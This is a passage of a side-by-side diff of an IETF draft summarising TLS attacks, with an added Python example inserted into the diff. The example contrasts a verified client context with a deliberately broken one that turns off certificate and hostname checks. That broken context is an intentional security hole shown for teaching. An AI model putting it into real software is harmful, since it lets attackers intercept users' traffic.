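The subgroup test is the expensive one (a full modular exponentiation), which is why clients tend to skip it; with standardized groups the primality of p can be replaced by comparing against the known list, but the range and subgroup checks on Ys remain necessary on every handshake.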
2.8. Denial of Service | 2.8. Renegotiation | |||
A major attack on the TLS renegotiation mechanism applies to all | ||||
current versions of the protocol. The attack and the TLS extension | ||||
that resolves it are described in [RFC5746]. | ||||
 | 2.9. Triple Handshake | |||
The triple handshake attack [[TRIPLE-HS, add the reference when | ||||
published]] enables the attacker to cause two TLS connections to | ||||
share keying material. This leads to a multitude of attacks, e.g. | ||||
Man-in-the-Middle, breaking safe renegotiation and breaking channel | ||||
binding via TLS Exporter [RFC5705] or "tls-unique" [RFC5929]. | ||||
2.10. Denial of Service | ||||
Server CPU power has progressed over the years so that TLS can now be | Server CPU power has progressed over the years so that TLS can now be | |||
turned on by default. However the risk of malicious clients and | turned on by default. However the risk of malicious clients and | |||
coordinated groups of clients ("botnets") mounting denial of service | coordinated groups of clients ("botnets") mounting denial of service | |||
attacks is still very real. TLS adds another vector for | attacks is still very real. TLS adds another vector for | |||
computational attacks, since a client can easily (with little | computational attacks, since a client can easily (with little | |||
computational effort) force the server to expend relatively large | computational effort) force the server to expend relatively large | |||
computational work. It is known that such attacks have in fact been | computational work. It is known that such attacks have in fact been | |||
mounted. | mounted. | |||
3. Security Considerations | 2.11. Implementation Issues | |||
 | Even when the protocol is fully specified, there are very common issues | |||
that often plague implementations. In particular, the integration of | ||||
higher-level protocols, TLS and its PKI-based authentication is the | ||||
source of misunderstandings and implementation "shortcuts". An | ||||
extensive survey of these issues can be found in [Georgiev2012]. | ||||
o Implementations may omit validation of the server certificate | ||||
altogether. For example, this is true of the default | ||||
implementation of HTTP client libraries in Python 2. | ||||
o Implementations may not validate the server identity. This | ||||
validation typically amounts to matching the protocol-level server | ||||
name with the certificate's Subject Alternative Name field. | ||||
o Implementations may be validating the certificate chain | ||||
incorrectly or not at all, or using an incorrect or outdated trust | ||||
anchor list. | ||||
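The three items above correspond to three concrete things a client has to get right. The following is an added example, not code from the draft: the hardened and the broken way to build a client context with Python's ssl module (the shortcut the draft describes, in which any certificate from anyone is accepted), and a stand-alone re-implementation of the RFC 6125 dNSName matching rules over the dictionary shape that `SSLSocket.getpeercert()` returns, so the identity check can be exercised offline against constructed certificates. The certificates and host names are constructed for the demonstration.

```python
"""Server certificate and identity checks that implementations tend to skip.

Added example, not from the draft.  Contexts use the standard ssl module; the
hostname matcher reproduces the RFC 6125 dNSName rules over the dict shape
returned by SSLSocket.getpeercert() so it can run offline.
"""
import ssl


def hardened_client_context() -> ssl.SSLContext:
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)  # loads the system trust anchors
    ctx.verify_mode = ssl.CERT_REQUIRED        # chain must validate (default, made explicit)
    ctx.check_hostname = True                  # name must match (default, made explicit)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def broken_client_context() -> ssl.SSLContext:
    """The shortcut the draft describes: no chain validation, no identity check.
    A MITM with a self-signed certificate is accepted silently."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False                 # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def context_verifies(ctx: ssl.SSLContext) -> bool:
    return ctx.verify_mode == ssl.CERT_REQUIRED and bool(ctx.check_hostname)


def _dns_names(cert: dict):
    names = [v for t, v in cert.get("subjectAltName", ()) if t == "DNS"]
    if names:
        return names
    # Fall back to the CN only when the certificate has no SAN at all.
    return [v for rdn in cert.get("subject", ()) for k, v in rdn if k == "commonName"]


def _name_matches(pattern: str, hostname: str) -> bool:
    pat = pattern.lower().rstrip(".").split(".")
    host = hostname.lower().rstrip(".").split(".")
    if len(pat) != len(host) or "" in pat:
        return False
    if pat[0] == "*":
        # The wildcard must be the whole left-most label and must not stand for a
        # registrable domain by itself: "*.example.com" yes, "*.com" no.
        return len(pat) >= 3 and pat[1:] == host[1:]
    return pat == host          # no partial wildcards such as "f*.example.com"


def hostname_matches(cert: dict, hostname: str) -> bool:
    """True when the presented certificate names the host the client asked for."""
    return any(_name_matches(n, hostname) for n in _dns_names(cert))


# Constructed certificates in getpeercert() shape; not real certificates.
GOOD_CERT = {"subject": ((("commonName", "www.example.com"),),),
             "subjectAltName": (("DNS", "www.example.com"), ("DNS", "example.com"))}
WILDCARD_CERT = {"subjectAltName": (("DNS", "*.example.com"),)}
TOO_BROAD_CERT = {"subjectAltName": (("DNS", "*.com"),)}
CN_ONLY_CERT = {"subject": ((("countryName", "US"),), (("commonName", "legacy.example.net"),))}

if __name__ == "__main__":
    print("hardened verifies:", context_verifies(hardened_client_context()))
    print("broken verifies:  ", context_verifies(broken_client_context()))
    print("wildcard vs api.example.com:  ", hostname_matches(WILDCARD_CERT, "api.example.com"))
    print("wildcard vs a.b.example.com:  ", hostname_matches(WILDCARD_CERT, "a.b.example.com"))
```

In production the ssl module performs both checks itself when `check_hostname` and `CERT_REQUIRED` are left on; the matcher here is for understanding and for auditing code paths that parse `getpeercert()` by hand. Note that a chain that validates against an outdated trust anchor list (the third item above) passes both checks and is only caught by keeping the store current.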
3. Applicability to DTLS | ||||
DTLS [RFC4347] [RFC6347] is an adaptation of TLS for UDP datagrams. | ||||
With respect to the attacks described in the current document, DTLS | ||||
1.0 is equivalent to TLS 1.1. The only exception is RC4 which is | ||||
disallowed in DTLS. DTLS 1.2 is equivalent to TLS 1.2. | ||||
4. Security Considerations | ||||
This document describes protocol attacks in an informational manner, | This document describes protocol attacks in an informational manner, | |||
and in itself does not have any security implications. Its companion | and in itself does not have any security implications. Its companion | |||
documents certainly do. | documents certainly do. | |||
4. IANA Considerations | 5. IANA Considerations | |||
This document requires no IANA actions. | This document requires no IANA actions. [Note to RFC Editor: please | |||
remove this whole section before publication.] | ||||
5. Acknowledgements | 6. Acknowledgments | |||
We would like to thank Stephen Farrell, Simon Josefsson, Yoav Nir, | We would like to thank Stephen Farrell, Simon Josefsson, John | |||
Kenny Paterson, Patrick Pelletier, Tom Ritter and Rich Salz for their | Mattsson, Yoav Nir, Kenny Paterson, Patrick Pelletier, Tom Ritter and | |||
review of this document. We thank Andrei Popov for contributing text | Rich Salz for their review of this document. We thank Andrei Popov | |||
on RC4. | for contributing text on RC4, Kohei Kasamatsu for text on Lucky13, | |||
Ilari Liusvaara for text on attacks and on DTLS. | ||||
The document was prepared using the lyx2rfc tool, created by Nico | The document was prepared using the lyx2rfc tool, created by Nico | |||
Williams. | Williams. | |||
6. References | 7. Informative References | |||
6.1. Normative References | [RFC4347] Rescorla, E. and N. Modadugu, "Datagram Transport Layer | |||
Security", RFC 4347, April 2006. | ||||
[RFC5246] Dierks, T. and E. Rescorla, "The Transport Layer Security | [RFC5246] Dierks, T. and E. Rescorla, "The Transport Layer Security | |||
(TLS) Protocol Version 1.2", RFC 5246, August 2008. | (TLS) Protocol Version 1.2", RFC 5246, August 2008. | |||
6.2. Informative References | [RFC5288] Salowey, J., Choudhury, A., and D. McGrew, "AES Galois | |||
Counter Mode (GCM) Cipher Suites for TLS", RFC 5288, | ||||
August 2008. | ||||
[I-D.ietf-uta-tls-bcp] | [RFC5705] Rescorla, E., "Keying Material Exporters for Transport | |||
Sheffer, Y., Holz, R., and P. Saint-Andre, | Layer Security (TLS)", RFC 5705, March 2010. | |||
"Recommendations for Secure Use of TLS and DTLS", draft- | ||||
ietf-uta-tls-bcp-00 (work in progress), March 2014. | [RFC5746] Rescorla, E., Ray, M., Dispensa, S., and N. Oskov, | |||
"Transport Layer Security (TLS) Renegotiation Indication | ||||
Extension", RFC 5746, February 2010. | ||||
[RFC5929] Altman, J., Williams, N., and L. Zhu, "Channel Bindings | ||||
for TLS", RFC 5929, July 2010. | ||||
[RFC6347] Rescorla, E. and N. Modadugu, "Datagram Transport Layer | ||||
Security Version 1.2", RFC 6347, January 2012. | ||||
[RFC6989] Sheffer, Y. and S. Fluhrer, "Additional Diffie-Hellman | [RFC6989] Sheffer, Y. and S. Fluhrer, "Additional Diffie-Hellman | |||
Tests for the Internet Key Exchange Protocol Version 2 | Tests for the Internet Key Exchange Protocol Version 2 | |||
(IKEv2)", RFC 6989, July 2013. | (IKEv2)", RFC 6989, July 2013. | |||
[I-D.ietf-uta-tls-bcp] | ||||
Sheffer, Y., Holz, R., and P. Saint-Andre, | ||||
"Recommendations for Secure Use of TLS and DTLS", draft- | ||||
ietf-uta-tls-bcp-01 (work in progress), June 2014. | ||||
[I-D.ietf-tls-prohibiting-rc4] | ||||
Popov, A., "Prohibiting RC4 Cipher Suites", draft-ietf- | ||||
tls-prohibiting-rc4-00 (work in progress), July 2014. | ||||
[I-D.ietf-tls-encrypt-then-mac] | ||||
Gutmann, P., "Encrypt-then-MAC for TLS and DTLS", draft- | ||||
ietf-tls-encrypt-then-mac-03 (work in progress), July | ||||
2014. | ||||
[CBC-Attack] | [CBC-Attack] | |||
AlFardan, N. and K. Paterson, "Lucky Thirteen: Breaking | AlFardan, N. and K. Paterson, "Lucky Thirteen: Breaking | |||
the TLS and DTLS Record Protocols", IEEE Symposium on | the TLS and DTLS Record Protocols", IEEE Symposium on | |||
Security and Privacy , 2013. | Security and Privacy , 2013. | |||
[BEAST] Rizzo, J. and T. Duong, "Browser Exploit Against SSL/TLS", | [BEAST] Rizzo, J. and T. Duong, "Browser Exploit Against SSL/TLS", | |||
2011, <http://packetstormsecurity.com/files/105499/ | 2011, <http://packetstormsecurity.com/files/105499/ | |||
Browser-Exploit-Against-SSL-TLS.html>. | Browser-Exploit-Against-SSL-TLS.html>. | |||
[CRIME] Rizzo, J. and T. Duong, "The CRIME Attack", EKOparty | [CRIME] Rizzo, J. and T. Duong, "The CRIME Attack", EKOparty | |||
skipping to change at page 6, line 34 | skipping to change at page 8, line 16 | |||
Fluhrer, S., Mantin, I., and A. Shamir, "Weaknesses in the | Fluhrer, S., Mantin, I., and A. Shamir, "Weaknesses in the | |||
Key Scheduling Algorithm of RC4", Selected Areas in | Key Scheduling Algorithm of RC4", Selected Areas in | |||
Cryptography , 2001. | Cryptography , 2001. | |||
[RC4-Attack-AlF] | [RC4-Attack-AlF] | |||
AlFardan, N., Bernstein, D., Paterson, K., Poettering, B., | AlFardan, N., Bernstein, D., Paterson, K., Poettering, B., | |||
and J. Schuldt, "On the Security of RC4 in TLS", Usenix | and J. Schuldt, "On the Security of RC4 in TLS", Usenix | |||
Security Symposium 2013, 2013, <https://www.usenix.org/ | Security Symposium 2013, 2013, <https://www.usenix.org/ | |||
conference/usenixsecurity13/security-rc4-tls>. | conference/usenixsecurity13/security-rc4-tls>. | |||
[Georgiev2012] | ||||
Georgiev, M., Iyengar, S., Jana, S., Anubhai, R., Boneh, | ||||
D., and V. Shmatikov, "The most dangerous code in the | ||||
world: validating SSL certificates in non-browser | ||||
software", 2012, | ||||
<http://doi.acm.org/10.1145/2382196.2382204>. | ||||
[Attacks-iSec] | [Attacks-iSec] | |||
Sarkar, P. and S. Fitzgerald, "Attacks on SSL, a | Sarkar, P. and S. Fitzgerald, "Attacks on SSL, a | |||
comprehensive study of BEAST, CRIME, TIME, BREACH, Lucky13 | comprehensive study of BEAST, CRIME, TIME, BREACH, Lucky13 | |||
and RC4 biases", August 2013, <https://www.isecpartners.com/ | and RC4 biases", August 2013, <https://www.isecpartners.com/ | |||
media/106031/ssl_attacks_survey.pdf>. | media/106031/ssl_attacks_survey.pdf>. | |||
[Padding-Oracle] | [Padding-Oracle] | |||
Vaudenay, S., "Security Flaws Induced by CBC Padding | Vaudenay, S., "Security Flaws Induced by CBC Padding | |||
Applications to SSL, IPSEC, WTLS...", EUROCRYPT 2002, | Applications to SSL, IPSEC, WTLS...", EUROCRYPT 2002, | |||
2002, <http://www.iacr.org/cryptodb/archive/2002/ | 2002, <http://www.iacr.org/cryptodb/archive/2002/ | |||
skipping to change at page 7, line 35 | skipping to change at page 9, line 21 | |||
sessions in SSL/TLS", 2003. | sessions in SSL/TLS", 2003. | |||
[Brumley03] | [Brumley03] | |||
Brumley, D. and D. Boneh, "Remote timing attacks are | Brumley, D. and D. Boneh, "Remote timing attacks are | |||
practical", 2003. | practical", 2003. | |||
Appendix A. Appendix: Change Log | Appendix A. Appendix: Change Log | |||
Note to RFC Editor: please remove this section before publication. | Note to RFC Editor: please remove this section before publication. | |||
A.1. draft-ietf-uta-tls-bcp-01 | A.1. draft-ietf-uta-tls-attacks-02 | |||
o Added implementation issues ("most dangerous code"), | ||||
renegotiation, triple handshake. | ||||
o Added text re: mitigation of Lucky13. | ||||
o Added applicability to DTLS. | ||||
A.2. draft-ietf-uta-tls-attacks-01 | ||||
o Added SSL Stripping, attacks related to certificates, Diffie | o Added SSL Stripping, attacks related to certificates, Diffie | |||
Hellman parameters and denial of service. | Hellman parameters and denial of service. | |||
o Expanded on RC4 attacks, thanks to Andrei Popov. | o Expanded on RC4 attacks, thanks to Andrei Popov. | |||
A.2. draft-ietf-uta-tls-bcp-00 | A.3. draft-ietf-uta-tls-attacks-00 | |||
o Initial WG version, with only updated references. | ||||
A.3. draft-sheffer-uta-tls-bcp-00 | ||||
o Initial version, extracted from draft-sheffer-tls-bcp-01. | o Initial version, extracted from draft-sheffer-tls-bcp-01. | |||
Authors' Addresses | Authors' Addresses | |||
Yaron Sheffer | Yaron Sheffer | |||
Porticor | Porticor | |||
29 HaHarash St. | 29 HaHarash St. | |||
Hod HaSharon 4501303 | Hod HaSharon 4501303 | |||
Israel | Israel | |||